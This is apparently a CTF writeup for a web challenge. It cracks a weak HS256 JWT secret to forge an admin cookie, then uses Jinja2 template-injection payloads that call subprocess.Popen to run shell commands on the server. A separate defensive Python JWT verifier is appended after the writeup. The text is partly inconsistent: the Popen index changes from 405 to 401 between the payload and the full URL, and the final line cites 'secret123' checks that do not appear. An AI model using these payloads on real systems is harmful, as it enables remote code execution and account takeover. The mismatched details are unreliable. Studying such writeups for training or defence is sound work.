![552287fab150917d502fd69e6144ed5d.png](f32ff9a37c60453da49847d379222794.png)

![ce00ceb552ae9d0904a532162dd7a294.png](1dd3fde110674cc887abfd7d2c47aef5.png)

Nothing out of place. Checking the cookies, we see what looks to be a JSON Web Token.

![c6faef91941939a2efa167c05f7c3e5f.png](e8a653503a34471cbefc16a2c6745c3b.png)

[jwt.io](http://jwt.io) confirms that it's a JWT and that it's signed with HS256 (HMAC-SHA256). Let's see if we can forge our own by cracking this one.

![b050e270ba96d5655b1e5ebebb11006d.png](4d5bf3f966584586a67b2b86318f813b.png)

Using jwt-tool to crack the key:

![226acd8034a841d6cd9278c7a6e366aa.png](74a740f30e8d41fabe78b937f8ddbfa7.png)

Time to forge our own admin JWT:

![56fddc6d81a563f2ce2f9ceef894fda9.png](558a41e0811f4fcda5788c25fb891cac.png)

By changing the cookie value to our new JWT, we've accessed the admin account.

![3cf47f3e8f6bea19629bc9dbf6ce52d0.png](4c3df24886594aa2b3e407f9244dc321.png)

Nothing seems to work here, and the only two options that do work kick back a 404.

![787091091eb05963e38822af42310b26.png](d05bc9dae21943b69f574f641f547900.png)

Interesting. The URL that's causing the error is reflected on the page, so it looks like we control it. Since the name of the challenge is 'Template Shack', let's jump right into template injection:

`jh2i.com:50023/admin/{{7*7}}`

![7bd20d4abe92a98ce34e2bf117f52e9b.png](3c85f08bf3ff4ad18c3148922be24744.png)

Template injection is a go! Starting with `{{''.__class__.__mro__[1].__subclasses__()}}`, we can look for the `'subprocess.Popen'` class.

![a299d2da352a9221b295b78abfab81f4.png](b929b0ab0af34779813fa562ea7064ea.png)

We need its exact index in the list. Let's use slicing to find it:

`{{''.__class__.__mro__[1].__subclasses__()[400::]}}`

By repeatedly slicing from higher indices, we can track down exactly where `subprocess.Popen` is:

`{{''.__class__.__mro__[1].__subclasses__()[405::]}}`

![e159267160d76fceb3e8bd4ef08f24ef.png](f83fc42f3d664051b6d111cd42718b1f.png)

Now that it's at the top of the list, we know it's at 405.

Payload: `{{''.__class__.__mro__[1].__subclasses__()[405]('cat flag.txt',shell=True,stdout=-1).communicate()}}`

Full URL: `http://jh2i.com:50023/admin/{{''.__class__.__mro__[1].__subclasses__()[401]('cat flag.txt',shell=True,stdout=-1).communicate()}}`

![caf0c6130af626580fefa9e7f7eb1fa5.png](35d7434a084c4d3c83fbf66e66a634e5.png)

This article explains it *much* better than I ever could: [https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee](https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee)

---

Tags: #ctf #ssti #jwt #web
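The JWT step above works because the server accepts any token whose HMAC matches under its secret, so a cracked secret is all an attacker needs. As an added example (not code from the writeup or the challenge), here is a minimal stdlib HS256 verifier with the checks a defender wants, plus a constructed weak secret and claims showing why cracking the secret is enough to mint an admin cookie:

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint a compact HS256 JWT (used here only to build tokens for the checks)."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes):
    """Return the claims if `token` is a valid HS256 JWT under `secret`, else None.

    The algorithm is pinned: the header's `alg` is checked against HS256, never
    used to choose how to verify, and the signature compare is constant-time.
    What this cannot fix is a guessable secret: a token minted with the cracked
    secret is indistinguishable from a genuine one, which is why the forged
    admin cookie in the writeup is accepted.
    """
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(payload_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return claims


def secret_is_strong_enough(secret: bytes) -> bool:
    """RFC 7518 requires an HS256 key of at least 256 bits (32 bytes); anything
    shorter or dictionary-derived is what makes an offline crack practical."""
    return len(secret) >= 32
```

The `secret123` value used in the checks is a constructed placeholder, not the challenge's key.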